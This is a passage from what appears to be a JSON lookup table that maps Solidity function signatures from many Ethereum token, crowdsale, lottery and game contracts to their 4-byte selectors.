"setAirdropTotalSupply(uint256)": "0xf377f5b7", "INCRYPT(uint256,string,string)": "0x13399d10", "getKey(address,string)": "0x7898b917", "donationsFrom(address)": "0xd1eb6404", "getByAlias(string)": "0x8f142842", "inCommunity(address,address)": "0x0b9bfa6c", "leaveCommunity(address)": "0xbead0513", "joinCommunity(address)": "0x73ec7df0", "changeKeys(string,bytes1[])": "0x3e589050", "verifyAccount(address,string,string)": "0x2d67a79e", "addAlias(address,string)": "0x46d0eb60", "setAliasPrice(uint256)": "0x1771d4d4", "sweepFunds(address,uint256)": "0x3904c5c1", "sweepTokens(address,address)": "0x1609be1d", "customTokenDefrosting(address[])": "0x540e2f5b", "standardTokenDefrosting(address[])": "0x73bbda81", "removeFrozenTokenConfigurations(address[])": "0xb82fd275", "changeFrozenBalance(address,uint256)": "0x298c3fc1", "changeCustomDefrostingRate(address,uint8)": "0x7fc446f2", "frozenTokenTransfer(address,uint256,uint8)": "0x4f31cc51", "BondkickToken(string,string,uint8,uint256,int256)": "0x55674efe", "setMemberShip(address,uint256)": "0x06502ac0", "extendMembership(uint256)": "0x9fcaa5ef", "ChessLotto()": "0xba59f784", "RtbRpay(address,uint256)": "0x4fdb7c47", "changeRoot(bytes32)": "0x3d59cd60", "redeemTokens(uint256,uint256,bytes32[])": "0x5daf7514", "isProofValid(bytes32[],bytes32)": "0x3db08826", "constructLeaf(uint256,address,uint256)": "0xe5fb9211", "getAdminComission()": "0x2e712cc1", "checkWin(uint256,address)": "0x2c8ee2ec", "_checkWin(uint256,address)": "0xd27a43f6", "buyTicketWithRef(address)": "0x16868752", "updateParams(uint256,uint256,uint256,uint256,uint256)": "0x401214a7", "withdrawAdmin()": "0x04c76af0", "ChelseavsArsenal()": "0x1fc983fb", "showTokenSaleClosingTime()": "0xae3125d9", "checkClaimEntitlementofWallet(address,address)": "0xa1d36cb0", "checkClaimEntitlement()": "0xbde236a5", "recoverTokens()": "0xb77f39fe", "adjustEntitlement(address,address,uint256)": "0x1902e902", "STOCoin()": "0xd8cb2d4a", "clacCooperateNeedLockAmount(uint256)": "0x4e159a05", "canTeamKeepingWithdraw(uint256)": "0x7bff9797", "canPlatformFundingWithdraw(uint256)": "0x7c58a4ed", "withdrawToCooperate(address,uint256)": "0x2f9021fd", "withdrawToTeam(uint256)": "0xd77da4f4", "withdrawToPlatformFunding(uint256)": "0xa62d9ba3", "processFunding(address,uint256)": "0xa7a2720e", "takeBack(uint256,uint256,bytes32,uint8,bytes32,bytes32)": "0xe4cdf3cc", "ASXC(uint256,string,string)": "0x5704b927", "setBonusUser(address)": "0x3fffebbd", "setSalesUser(address)": "0x7f879229", "setFounderUser(address)": "0xeacba6c7", "setSaleLot4StartTime(uint256)": "0x71d4edaf", "setSalesEndTime(uint256)": "0x8cefaf1a", "setContractAddresses(address,address,address)": "0x8ab63380", "drainContract()": "0xd0360e59", "XHO()": "0x817ad683", "TeamHOMO()": "0xac978cea", "JDAnteil()": "0x4b468b0e", "getStrong()": "0xb38c7e3a", "airdropMinting(address[],uint256[])": "0x3ff00ba5", "boschcoin()": "0x53bad0b9", "SupeciesToken(uint256,string,uint8,string)": "0x3960eddf", "validSupply()": "0x984d11fc", "SomeCoin(string,string,uint8)": "0x40debefd", "SomeCoin(string,string,uint8,uint256)": "0x0eba7f2d", "getBundinha()": "0x667f9510", "setBundinha(string)": "0x33ea7a2b", "getN()": "0x3e955225", "setN(uint256)": "0x3f7a0270", "set_lock_list(address,address,uint256)": "0xa22f2b2e", "check_lock(address,address)": "0x76b088a9", "check_period(address,address)": "0xdae1ddd2", "check_lock_period(address,address)": "0x43973140", "activationOpen()": "0x7da4d24b", "nextSession()": "0xc55ee28c", "penalizeInactiveJuries(address[],uint256[])": "0x20c12f16", "penalizeInactiveArbitrators(address[],uint256[])": "0xa6bb012b", "executeTokenRepartition(uint256)": "0x4e5a33c5", "voteRuling(uint256,bool)": "0x359d04a2", "appealRuling(uint256,uint256)": "0x913b2958", "untrustedExecuteRuling(uint256)": "0x77a8bc86", "arbitrate(uint256,bool)": "0x10eeb69a", "createDispute(uint256)": "0x4ac8a529", "drawnTokens(address,uint256,uint256)": "0x139cd9d3", "drawnArbiter(address,uint256)": "0xe3d9e8ea", "activateTokensForJury(uint256)": "0xa48be00b", "activateTokensForArbitration(uint256)": "0x01080c6f", "blocked(address)": "0xe5962195", "Court(address[],uint256[])": "0xbfca33f7", "hasPermission(address,address,bytes32,bytes)": "0xfdef9106", "sendPayment(uint256,address)": "0xc58a6ce8", "transferPayment(uint256,address)": "0x137a3fa7", "testSimpleObject()": "0x7375e0fe", "newAPM(bytes32,bytes32,address)": "0xaac57b3a", "newValue()": "0x7c65452c", "newProof()": "0x5710de14", "Linkable(address,address)": "0xc6ee7a2c", "feedOnKitty(uint256,uint256)": "0x17a7f4cc", "feedAndMultiply(uint256,uint256,string)": "0x6b0bfc80", "setKittyContractAddress(address,address)": "0x85839731", "getAdjudicatorAddress()": "0x0d3cb409", "Rules()": "0x64b7f1d3", "test_threeValidAndInvalidEqAddress()": "0x8513db86", "test_twoValidAndInvalidEqAddress()": "0x392ffcfb", "test_oneValidAndInvalidEqAddress()": "0xe0df51bb", "test_threeInvalidEqAddress()": "0x3f80135f", "test_twoInvalidEqAddress()": "0x246cbacc", "test_oneInvalidEqAddress()": "0x5102e238", "test_messageSenderEq()": "0xd2e8309e", "test_oneInvalidEmptyAddress()": "0x372ea717", "test_oneValidEmptyAddress()": "0x6afe74c9", "test_threeValidEqAddress()": "0x9cc1c97b", "test_twoValidEqAddress()": "0x171d833c", "test_oneValidEqAddress()": "0xf78e4210", "biathlon_transfer(address,address,uint256)": "0x0325be06", "register_with_node()": "0x00ce4462", "transfer_storage_ownership(address)": "0xf8c8282b", "BiathlonToken(address,address,string,string,uint256,address)": "0x522e2d3c", "swap()": "0x8119c065", "HotCold()": "0x42e06ee7", "SendResult(uint64,uint64)": "0xe5e04a33", "Register(bytes4)": "0x8b3c4f6f", "LotteryClaveChain(address)": "0x962174b6", "set(bytes32,uint256)": "0x273f4940", "SelfDestructManager()": "0xc7db04d7", "createGame(uint256,address)": "0x3ea11222", "setEthlanceSponsorWalletContract(address)": "0xc355eaf0", "setRole(address,bytes32,bytes32,uint256)": "0x83123f30", "hasRole(address,bytes32,bytes32)": "0xd865ae9b", "Users()": "0x4b6ede29", "StandardGame()": "0x38c97949", "newStandardCampaign(string,uint256,uint256,address)": "0x9e584658", "currentTokenBalance()": "0x23c94353", "currentEtherBalance()": "0xd5a5825d", "amountOfEthersOwnerCanWithdraw()": "0x99fca937", "sellTokens(uint256)": "0x6c11bcd3", "buyPriceAt(uint256)": "0x383e3a5d", "BokkyPooBahsEtherRefundablePrize()": "0xdf20d738", "sell()": "0x45710074", "getPrice(uint32)": "0xda26663a", "parseBitcoinComFeed(string)": "0x78a9e88a", "voteForCandidate(bytes32)": "0xcc9ab267", "Voting(bytes32[])": "0x7e1cd79c", "migrate(address,uint256)": "0xad68ebf7", "issueTokens()": "0x60ab5852", "MoedaToken()": "0xd7d43b41", "f(address)": "0xfc68521a", "newProposal(address,uint256,bytes32,string)": "0x173a4b70", "DelegateDualOwnable(address,address)": "0x3e546675", "getTargetReporterGasCosts()": "0xde66ed0d", "testLockTokensForTrading()": "0xd50b7123", "testNeededBalanceForContractCreation()": "0x495bbcae", "testInitialBalance()": "0x4a4507ff", "_isAuthorized(address,bytes4)": "0xffa39d3f", "Roles2LibraryAdapter(address)": "0x5efc156f", "addUserRole(address,uint8)": "0xe1e09299", "BlockTubePrepaid()": "0x8c8e5f1f", "Lesson_1(address,uint256)": "0x90a5c7af", "setinterval(uint256,uint256)": "0xe6c5e94c", "PoezenVoting(uint256,uint256)": "0x5e986ec7", "isTokenSaleToken(address)": "0xe7a05f08", "testAllowance()": "0x6bee73db", "testFailTransferFrom()": "0x058fcde9", "testApprove()": "0x1aeb10a6", "testFailBadTransfer()": "0x760ac21b", "testBalanceOf()": "0x3df77c0e", "totalShares()": "0x3a98ef39", "sharesValue(uint256)": "0x50e3b157", "valueOfShares()": "0x9aedabca", "equity()": "0x91a0ac6a", "sharesHeld()": "0x97907827", "Gavsino()": "0x0d59c736", "endCall()": "0x38e45c65", "TRLCOIN_DECIMALS()": "0xd126ae0c", "lastBlock_a12()": "0x1932bb33", "numOfSampleTypes()": "0x96fcbf65", "STAGE_ONE_BET_LIMIT()": "0x55838881", "DefaultCents()": "0xc0a5bcbd", "voteCost()": "0x4c1b8ffd", "protectedDenominationOfOrigin()": "0xbb6f6c15", "STAGE_3_MAXCAP()": "0x385fb8a6", "WithrawDevToken()": "0xd4c49094", "addressFundFounder()": "0xf083e8f2", "Rate7()": "0x611067a1", "getBounty()": "0xf49bff7b", "tier_cap_2()": "0xe6abaaba", "purchaseEndTime()": "0x2f0e23fb", "migrator()": "0x7cd07e47", "FACTOR_7()": "0x2202dcad", "next_balance()": "0xb2893ba5", "hasTwoYearWithdraw()": "0x9b73a5d9", "TOKENS_PER_ETHER_DAY_ONE()": "0xee4aa327", "MIN_PLAYERS()": "0x85f07bbe", "maximumSellableTokens()": "0x3ad075ea", "saleMarket()": "0xe33607da", "newPlayerFee()": "0x2b343100", "BONUS_TIER_8_LIMIT()": "0x7802857a", "TOTAL_SUPPLY_CAP()": "0x48931352", "totalSpankStaked()": "0xcd43ebf9", "XaurumAmountMelted()": "0x04461f4d", "yearlyTeamAmount()": "0x9497b7a1", "maximumNonWhitelistAmount()": "0x8e9030f4", "isSiringClockAuction()": "0x76190f8f", "applicableRate()": "0x6878ac7d", "marketDefaultFeeHigh()": "0xcaf6cb3f", "getEtherReceived()": "0x0dc193f5", "weightLostPartLimit()": "0x5509b160", "MIMIMUM_CONTRIBUTION_AMOUNT_ICO()": "0x263b694a", "minWeiPerContributor()": "0xfce9fbff", "for_sale()": "0x561ef5b6", "systemEndingPrice()": "0x23bc29a0", "teamWallet_4()": "0x68049361", "MEDIA_SUPPORT_WALLET()": "0x4dc5fa4e", "benReady()": "0x1e7230c5", "CTO()": "0x3d01bdec", "getCurrentHeroOwners()": "0x22760877", "dividendsDistributor()": "0xc3a69a75", "TeamFundsTokens()": "0x6d0b5ee2", "blackListFreezeTime()": "0x0522345a", "BuyMOYTokens()": "0xd87d2b8d", "crowdSaleOverTimestamp()": "0x5c1098c3", "deathData_f7()": "0xaaa24d31", "mintFee()": "0x13966db5", "getWithdrawedToken()": "0x5ba87a4d", "SendPreReserved2()": "0xac592944", "exchangeEnd()": "0xa3fe70cb", "canRestoreUnsoldTokens()": "0xc5699ac2", "priceETHUSD()": "0x58ed766d", "VESTING_CLIFF_DURATION()": "0xfe19f495", "deployAgent()": "0x9752f163", "rateProvider()": "0x949db658", "oldOwnerProfit()": "0xbb72b12d", "ProjectTag()": "0x40f3c364", "userRank()": "0x738fa7a4", "oracleIsUpdating()": "0x44fa9ca6", "MAX_PURCHASE()": "0x7146bd08", "lockCycle()": "0xf8132b66", "dateSaleStarted()": "0xdc1fca7e", "betsLost()": "0xc57dead7", "CurrentState()": "0xb7c03170", "totalBonusTokens()": "0xfc5d9244", "priceRound4()": "0xb789321a", "IsICONotStarted()": "0x69ab8e52", "INITIAL_PRICE_INCREMENT()": "0x25b10186", "allocTokenHolder()": "0xabd1a89c", "isRefundingEnabled()": "0x961d1284", "totalLareSold()": "0x01fbaf99", "PRIVATE_ADDRESS()": "0x70090164", "roleEditorAddress()": "0x7ea60eb8", "freeTokensIssued()": "0x5deeab39", "nextJackpotTime()": "0x435bb6b9", "tokenIssuedMainSaleIco()": "0x7064e50c", "secondStageDatetime()": "0x16b8aa6b", "advisorCount()": "0x21b43777", "teamCap()": "0x6d81779b", "totalPlayerCount()": "0x26d541b0", "centsRaised()": "0x5259fcb4", "developersRecipient()": "0x609ff0fb", "exchangeSupply()": "0x91c8e336", "mintBounty()": "0xafc48052", "recommendProportion()": "0x406843ee", "redeemRate()": "0x0adcdbaa", "unblockFirstStake()": "0x440a7a0c", "ESSgenesis()": "0xb0b773c4", "t_Andrey2()": "0xfde5e124", "getTotalRaised()": "0x9f550293", "fee_msg()": "0xcc36809f", "TARGET_DURATION_BETTING_BLOCK()": "0xf514e92c", "m_proofs()": "0x284cfedb", "isUseContractFreeze()": "0x4694fe85", "getJackpotAmount()": "0xed8b6556", "BUYER_CAP_LOW_USD()": "0x9a5eb28f", "soldIdeaWeiPostIco()": "0xd4768994", "getUserLogin(address)": "0x4d42b0e5", "getUserCoolDown(address)": "0xecd1a83a", "getUserAllowance(address)": "0x0c6ddc0d", "Somplak()": "0xb90c8566", "motodoughToken()": "0x7e18dd21", "sendTokensAfterCrowdsale()": "0xccf7d0d4", "setn(uint256,uint256,uint256)": "0x6d25924d", "set(uint256,uint256,uint256,uint256)": "0x606ce3bf", "checkDistance(uint256,uint256)": "0x3b8eee6d", "submitDistance(uint256[])": "0xff0efd6c", "setup(uint256[])": "0x24f35549", "Lambotoken()": "0x9bbfa582", "JorgeToken()": "0xea863e62", "FinastraToken()": "0xb62c3a4f", "disableTransfer(address)": "0x432e8946", "VieToken()": "0xea6825aa", "approvedRatio(uint256,uint256,uint256,uint256)": "0xf0560ea0", "tokensAmountForPurchase()": "0x0693e603", "setMinimumTokensForPurchase(uint256)": "0xb28f53fe", "removeFromWhiteList(address,address)": "0xc6b0de7e", "TPCToken()": "0x4d437a62", "addUser(int256)": "0xe8959b94", "getUser(int256)": "0xd0f86c9d", "getRewarder(int256)": "0x10e6be35", "dspcoin()": "0x63cd1da7", "KangenToken()": "0xfe4f7e11", "DolyToken2()": "0x3bfed5dc", "DoubleSixToken()": "0xe960b940", "updateClosetime(uint256)": "0x971a3593", "getWhoPiad(uint256,address,address,address,address,address,address,address)": "0x1b79d406", "create(address,address,address,address,address,address,address)": "0xe0775be1", "KKToken(uint256,string,uint8,string)": "0xfb35a4ba", "GamersCoin1()": "0xf9a56fd8", "YASToken()": "0xf2414cbd", "etherBack()": "0x3c1853e7", "addCET6(uint32,string,uint32,uint32,uint32,uint32)": "0x29c6647b", "addCET4(uint32,string,uint32,uint32,uint32,uint32)": "0xf221b75a", "addDoctor(uint32,string,uint16,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0x1917e6d1", "addMaster(uint32,string,uint16,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0xb2cb26c1", "addUndergraduate(uint32,string,uint16,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0x8a4ea479", "getUserNum()": "0xcdce5206", "createToken(address,address)": "0x6ed776b2", "NovioCoin_TEST()": "0xceda4a03", "messageBoard1(string)": "0xd4df89e2", "BitCoin(address,uint256,uint256,uint256,address,address)": "0x3b2f3d4d", "setPrice(uint32,uint32)": "0x67ef5cb9", "getRemainManus()": "0x2be4fd9c", "backManusOwner()": "0xbacc58d7", "Manus()": "0x01ab2f14", "transferDirect(address,uint256)": "0x56c23836", "transferManyDirect(address[],uint256)": "0x3c2e2624", "getBalanceOfContract(address)": "0x28b44b4b", "getBalanceOfUser(address)": "0x45909a6f", "JoshContract()": "0xa91faadf", "OVALExchangeToken()": "0x2ac4a51d", "DSToken(bytes32,uint256)": "0x18695c4d", "fetchJugadas()": "0x6cdffb3c", "addJugada(uint256,string,string,uint256,uint256)": "0x4e8182c8", "updateDireccion(address,bool)": "0x73fc83fa", "arrr(uint256[])": "0xac0287e2", "by(bytes32)": "0x1bfea87f", "a(uint256,string)": "0x65b6d9e2", "setLastBuyer(address)": "0x92daec51", "getLastBuyer()": "0x3f3246a0", "setReferer(address)": "0x35393197", "setTurnoverTo(address,uint256)": "0x8a8cd78d", "setTurnover(uint256)": "0x100565f4", "getTurnover(address)": "0xc03b70d5", "setEthPercent(uint256)": "0xfdbb16fd", "setCoinPercent(uint256)": "0x82e96916", "getFreeBalance(address)": "0x8870985b", "getLockedBalance(address)": "0xc4086893", "clearLock(address)": "0x8dc73521", "decreaseLockBalance(address,uint256)": "0x6c4e5c86", "increaseLockBalance(address,uint256)": "0xe6108fc9", "clearReleaseTime(address)": "0xa31052e8", "getReleaseTime(address)": "0x0cb7eb4c", "MEWSToken()": "0x65b051b8", "_buyXname(bytes32,uint256,bytes32)": "0x19ddd5a3", "prossWinOrLoss(uint256)": "0x5b19a8f3", "gameCore(uint256,uint256,uint256,bytes32)": "0x5d8e772f", "buyCore(uint256,uint256,uint256,bytes32)": "0xe51a7826", "transferToAnotherAddr(address,uint256,bytes32)": "0x78bee6b4", "withdrawWonCosFromGame(uint256,uint256,uint256)": "0x26949220", "withdrawAffVault(uint256)": "0xbf43e91c", "withdrawHoldVault(uint256)": "0x7707e2b2", "buyLeader(uint256,uint256)": "0xcd634920", "buyProp(uint256,uint256,uint256)": "0x3d677067", "playGame(uint256,uint256,uint256,bytes32)": "0xd641f3e4", "sellKeys(uint256,uint256,bytes32)": "0x47a21679", "getCurrentRoundTeamCos()": "0x97dd9892", "getPlayerRoundInfoByID(uint256,uint256)": "0x16d2bc5c", "buyXname(bytes32,uint256,bytes32)": "0x0a0900a1", "buyXaddr(address,uint256,bytes32)": "0x16281405", "buyXid(uint256,uint256,bytes32)": "0x2bb9cb1d", "faucetTo(address,uint256)": "0x5e556a4a", "hasDeposits(address)": "0x73d384c8", "_validateReferrer(address)": "0xcc1027ea", "_deliverTokens(address,uint256,uint256,uint256)": "0xfe4c6b08", "_orderTokens(address,uint256,uint256)": "0xead956c1", "makeItRain(address[],uint256[])": "0x9ef887ec", "getStep()": "0x9e5288a0", "setStep(uint256)": "0xf8dcbddb", "MTelCoin()": "0x8b79bb43", "getEtherInEuroCents()": "0xa64f0ca4", "isStaff(address)": "0xcb510e97", "removeStaff(address)": "0xc4522c92", "acceptAdminToo()": "0xc77bd8cc", "changeAdminToo(address)": "0xb6195134", "ensureInAccountList(address)": "0xc5afce8b", "removeFromAccountList(address)": "0xbecf9ce1", "addToAccountList(address)": "0x4e2567d0", "setReadOnly(bool)": "0x10ea6b34", "giveDividend(uint64)": "0x34c2904b", "giveReserveTo(address,uint256)": "0xc0ee57a5", "requireTrade(address)": "0x7e7d5689", "isReadOnly()": "0xdc2a60f6", "getPlayerHistories(address,uint256)": "0x73ffecd0", "getPlayerAccountBalance(address)": "0xeb1e2cd9", "getReferrerAddr(address)": "0xea726acb", "determinReferrer(address)": "0x6be422b2", "showRdWonNum(uint256)": "0xd3a57b9f", "showKeys(uint256)": "0x48293aae", "getPlayerReferrerID(uint256)": "0x61d3d902", "getPlayerPlayedTimes(uint256)": "0x69d0e33c", "getTeamPlayersNum()": "0xf27b9341", "showTopsPlayer()": "0xe36e5d18", "showTopBonusBalance()": "0xa338bd2c", "showDevBalance()": "0x6e30d411", "showInvestBalance()": "0xc4749bbd", "showJackpotNextRd()": "0xc56935e2", "showJackpotThisRd()": "0x42c3301a", "showRoundNum()": "0x29a2629c", "buyAKeyWithAmount(uint256,address,uint256)": "0x2a792f57", "buyAKeyWithDeposit(uint256,address,uint256)": "0x3415bdd4", "updateKeyPrice(uint256)": "0x1f1ec029", "transferDevBalance(address,uint256)": "0xb714075e", "transferDividendBalance(address,uint256)": "0xb0fb3095", "updateJackpotLeft(uint256)": "0x9aebdf7e", "updateWonNums(uint256,uint256)": "0xe280d66b", "gameDestroy()": "0xa27c9af0", "subAccountBalance(address,uint256)": "0xf3a67ad2", "addBalance(uint256,uint256,uint256)": "0x7d69880b", "addRefBalance(address,uint256)": "0x9cf60b86", "updatePlayedNum(address,address,uint256)": "0x2c305abf", "createPlayer(address,address)": "0x921237a4", "changePrizeSplits(uint256,uint256,uint256,uint256,uint256)": "0x123ba3e2", "changeIncomesSplits(uint256,uint256,uint256,uint256,uint256,uint256)": "0xee5c9654", "AIWEBToken()": "0x74e99f87", "AkershoekToken()": "0x88bb6e68", "FreshROI(uint256,uint256)": "0x1229af09", "createHero(uint16,address)": "0xf36631e7", "purchaseByEMONTImpl(uint16,uint256,uint64,address)": "0x7cad997f", "purchaseImpl(uint16,uint64,address)": "0xe3ba80d0", "computeCurrentPriceImpl(uint16,uint64)": "0xfdccf45e", "isOnSale(uint16,uint64)": "0xe7368a1f", "airDropHero(uint16)": "0xaf2b76ab", "canBePurchasedByEMONT(uint16)": "0x6883477f", "canBePurchasedByETH(uint16)": "0xe9485982", "mintHeroAsset(address,uint256)": "0x4d5b335d", "getSupplyLimit(uint16)": "0x8450b12e", "setSupplyLimit(uint16,uint16)": "0x6fa23f73", "abort(uint16)": "0x9f912d25", "removeAnimalIdFromCountry(uint256,uint256)": "0xe71346f4", "refundSender(address,uint256)": "0x6a9c97d6", "calculateNextEtherValue(uint256)": "0xf337c2e1", "setRarityTargetValue(uint8,uint256)": "0x541bb358", "changeAnimal(uint256,uint256,bytes32,uint8)": "0x16244907", "changeCountry(uint256,bytes2)": "0xef739d0f", "addAnimal(uint256,bytes32,uint8)": "0x30e656d8", "addCountry(bytes2)": "0xdc5936f0", "setShouldGenerateDna(bool)": "0x5675db9c", "setDevelopersFee(uint8)": "0xa437ab52", "getShouldGenerateDna()": "0x00173d65", "getMarketplaceContract()": "0xaff46572", "getDevelopersFee()": "0x595f40d6", "getDnasCount()": "0xa8575102", "getDna(uint256)": "0x422627c3", "getAnimalsCount()": "0x0931ce67", "getAnimal(uint256)": "0x45d3cc81", "buyAnimal(uint256)": "0x1a14e94a", "getPlayerDnas(address)": "0x157cb62c", "getPlayerAnimals(address)": "0xba622ddc", "setMarketplaceContract(address)": "0x1102610e", "createAuction(uint256,uint128,uint128,uint128)": "0x011879db", "adjust_eth(uint256)": "0xc47e951f", "forceRoll()": "0xcbc9023c", "startRaffle(uint256)": "0xf1ae8c55", "fillFromQueue()": "0x9717df19", "receiveFromGame()": "0x386304e4", "awardToken(address,uint256)": "0xded2d0f4", "Bithemoth(address,address)": "0xd8b0403a", "masssend(address[],uint256[])": "0xdf6ab3d5", "_addToWhitelist(address)": "0xfa518054", "pushPrivateInvestment(uint256,uint256,address)": "0x778d00f0", "transferBack()": "0x1d7876e7", "transferClub(address,uint256)": "0x034cf8bc", "ClubTransferContract()": "0x03402a9a", "BitcoinXL()": "0xe274fa4e", "GetChipsInfo(address)": "0x7fb3d459", "mintingDec()": "0x534439a3", "totalWeight()": "0x96c82e57", "MIN_LEADER_FRAC_TOP()": "0x3f6ea2a8", "MAX_CARS()": "0xec14f974", "bonusMultiplier()": "0xa8b973a1", "WALLET_LB_TEAM()": "0x8c937da3", "secondPhaseStartTime()": "0x42170736", "tier0Total()": "0x428a8120", "mainTokensPerDollar()": "0x5224dfbe", "numResponseOptions()": "0x508df5df", "adviserWallet()": "0x8812ec52", "privateOfferingExchangeRate()": "0x5b5b45ef", "maxGoal()": "0xf71441a5", "min_tokens()": "0x2516c6c6", "excess()": "0x1ae2379c", "bonusSize()": "0x19c5b887", "toToteLiquidatorWallet()": "0xac5aaa5b", "wallet_Mini_Address()": "0x7558d9a6", "EXPLOSION_DENOMINATOR()": "0x14e604b6", "softCapPrice()": "0x55d1b4d3", "ec()": "0xf83b5dce", "maxDebt()": "0xd0064c00", "Libidocoin()": "0xaf4d723c", "providerContract()": "0x9b263eca", "ico1Tokens()": "0xca3e1733", "totalT8EXSold_GENERAL()": "0x28276ed6", "proxyContract()": "0xed550443", "bonusPeriod()": "0x4af4a127", "agent()": "0xf5ff5c76", "dollarMultiplier()": "0x6777e4eb", "currentVotingAmount()": "0x9a163c44", "claimRefundVaultOwnership()": "0x4eb56999", "PRIVATE_SALE_ACCOUNT()": "0x3e11456f", "optionsRegistryAddress()": "0x7be68454", "isCrowdSaleActive()": "0xb7b1d7f7", "maxUsdFundingReached()": "0xd3df2d01", "exchangeRateUSDToToken()": "0xa4b0a36f", "ethToBeClaimed()": "0xe4a0d386", "preicoSale()": "0x8e53f4fb", "extra_bonus()": "0x59e529cc", "OVISBOOKED_TOKENS()": "0xb9e77649", "currentRoundBudget()": "0xb92a3961", "claimDividendPercentage()": "0xd679c4f2", "initChallenge()": "0xc4b6b5fd", "rateTier4()": "0x26b45b09", "exchangePreDGZTokens()": "0x2ac6f15f", "getAssetIDHash()": "0xa773d98a", "time_bought()": "0xc3dac9a1", "totalPurchase()": "0x7b2581c2", "bountyInit()": "0xa2d89edf", "secondPrivateLockTime()": "0x325654ae", "team2019TokenCreated()": "0xd2548393", "taxTokenCreated()": "0x425f7857", "TRANSFER_PROXY_V2()": "0xad93640f", "BrinkzSupply()": "0xc0c95917", "phase2EndBlock()": "0x6aa68a15", "crowdSalePercentage()": "0xbf503a6e", "lastSaleTime()": "0xf897c998", "totalTransfer()": "0xbb3f5b7d", "nFund()": "0xc5e3adf5", "getTotalAmountOfChatMessages()": "0xc2235e74", "FeeRate()": "0xabe2a16e", "HyipProfitTokenTeamAddress()": "0xe70c3276", "initBronze()": "0x7add0106", "inrSessions()": "0xbbd3b2ab", "usedReserveSupply()": "0xdb3fd0b8", "SCRefundVault()": "0xbde97455", "soldTokens()": "0x5ed9ebfc", "returnETHforNormalBuyers()": "0x1f4ae468", "minimumPrice()": "0x7f386b6c", "team3Address()": "0x2889e822", "getXNKPurchased()": "0xd979e906", "WHITELISTING_DURATION()": "0x164a009e", "lastPaymentDate()": "0x7aeabb39", "START_TIME_PRESALE()": "0x045b9c72", "totalTokensRemind()": "0x58933dbc", "isPreIcoActive()": "0x1158183a", "nextGameSettings()": "0x333aed82", "originalAuction()": "0x38014395", "getMin(uint256[])": "0xda18bcef", "getSoftCapInWeis()": "0xb0bf092a", "CONTINUE_MINTING()": "0x003fd35a", "lowestGameWithoutQuorum()": "0x1406d3be", "airEndtime()": "0xb0f85a10", "BestEtherSupply()": "0x6707b8aa", "initialDate()": "0x945ade92", "PurchaseToken()": "0x776a038e", "minCapPre()": "0xca0c2024", "getInvalidKeys()": "0x15a50aff", "JackpotHits()": "0x52122abf", "presalePerEth()": "0x657ad479", "deployedPresaleContract()": "0x15bf7cd7", "reserveEscrow()": "0xb12e1449", "initialTokenAmount()": "0x4e505367", "allocationAddressPreICO()": "0x0e0f1f00", "partner1_will()": "0x0b6bf29f", "conversionRate()": "0x7ffdf53e", "dateSisterWins()": "0xc0465f3a", "stakeFailOverRestrictionLifted()": "0xdfeb34b6", "flipTokenReward()": "0x66476fcc", "setDebugNumber(uint256)": "0x3c6d7b47", "_canLotteryFree(address)": "0xe9ad72d7", "changeMartial(uint256)": "0x0f92f38f", "getTravelPrice(uint256)": "0x1ec87b86", "_getTravelPrice(address,uint256)": "0xa447405e", "absSub(uint256,uint256)": "0xa8ca698b", "getMartialNumber()": "0x90869e9f", "getMartialOwner()": "0xe2775da5", "getMartialListInfo()": "0x14c485c9", "getMartialInfo(uint256)": "0x956a860d", "getUserCurrentMartialId()": "0xc288ab9d", "buyHunterLicence()": "0x61b46d61", "getCurrentHunterLicencePrice()": "0x210bd306", "userHasHunterLicence(address)": "0x7cd9b0f8", "createEtherMonster(uint256,uint256,uint256)": "0x7692ac94", "buyLuckyStone()": "0x49f6444e", "getCurrentLuckyStonePrice()": "0xb9459b70", "userHasLuckyStone(address)": "0xe464dcc8", "buySmartSpeed()": "0xc8cf67a1", "getCurrentSmartSpeedPrice()": "0x31e99e2b", "userHasSmartSpeed(address)": "0x8301fb61", "createNewCardType(uint256,uint256,uint256,uint256)": "0x46517145", "createNewMartial(uint256,uint256,uint256)": "0x9434c981", "enableLotteryGiveHunt()": "0x43406182", "disableLotteryGiveHunt()": "0xe8f04e84", "EthWuxia()": "0x876ee240", "XMAX()": "0x0afa371d", "unFreeze(address)": "0x83cfab42", "addFreeze(address)": "0x0e25b620", "TCGC(address)": "0x5cfe237a", "WrestleCoin()": "0xd06ba559", "pushToApproved(address,uint8)": "0x0b1a3144", "setPreSaleContract(address)": "0xb5a5b8f5", "CryptopusToken()": "0xfee4f84d", "ChickenFarmer()": "0x827fc57c", "getParticipant()": "0x14b87862", "VernamWhiteListDeposit()": "0x85dcfbd4", "withdrawRake()": "0x2a583b90", "getRefunded()": "0xb3834ed4", "refundEverybody()": "0xa14b877b", "startEvent()": "0xe2fd38e9", "totalWageredForAddress(address,address)": "0x580efd6b", "totalPrizePool()": "0x398ab9a7", "totalRake()": "0xdc5fced4", "PariMutuel()": "0xed73b6a6", "BanknadToken()": "0xbdc056c0", "MOONTRAIL()": "0x3e95c9b6", "updateAnimalSpecial(uint256,bool)": "0x1aca120b", "updateAnimal(uint256,string,string)": "0x98e12d12", "deleteMember(address)": "0x11ffb1d4", "listMembers()": "0xb6afd2ca", "approvePendingCostume(uint256)": "0xb3f691c2", "buyCostume(uint256,uint256)": "0x0c2b14fe", "getAnimalIdsWithPendingCostume()": "0xcae20b59", "getEggPhaseList()": "0x08aeda8b", "getChildrenAgainstAnimalId(uint256)": "0x82acaa39", "removeFromEggPhase(uint256)": "0xf0e1354c", "pauseContract(bool)": "0xe272b892", "changeOwnerSharePerThousandForMating(uint256)": "0xe0ac61bb", "changeOwnerSharePerThousandForBuying(uint256)": "0xfa667907", "changeFreeAnimalsLimit(uint256)": "0xec7f9906", "getAllSaleAnimals()": "0xc56cf2b2", "getAllMatingAnimals()": "0x8c590b5d", "setBuyingCostumeRate(uint256)": "0x4713f29b", "setSaleAdvertisementRate(uint256)": "0xedbae7c6", "setMateAdvertisementRate(uint256)": "0xc334ea8f", "showMyAnimalBalance()": "0x1ae6c09c", "withdrawMatingRequest(uint256)": "0xe9dff847", "putMatingRequest(uint256,uint256)": "0x4a947bdb", "withdrawSaleRequest(uint256)": "0x537a082c", "putSaleRequest(uint256,uint256)": "0xe74803db", "TransferAnimalToAnotherUser(uint256,address)": "0x736eec58", "mateAnimal(uint256,uint256,string,string)": "0xe0eb9449", "buyAnimalsFromUser(uint256)": "0xedaee1dc", "buyAnimalsFromAnimalFactory(string,string)": 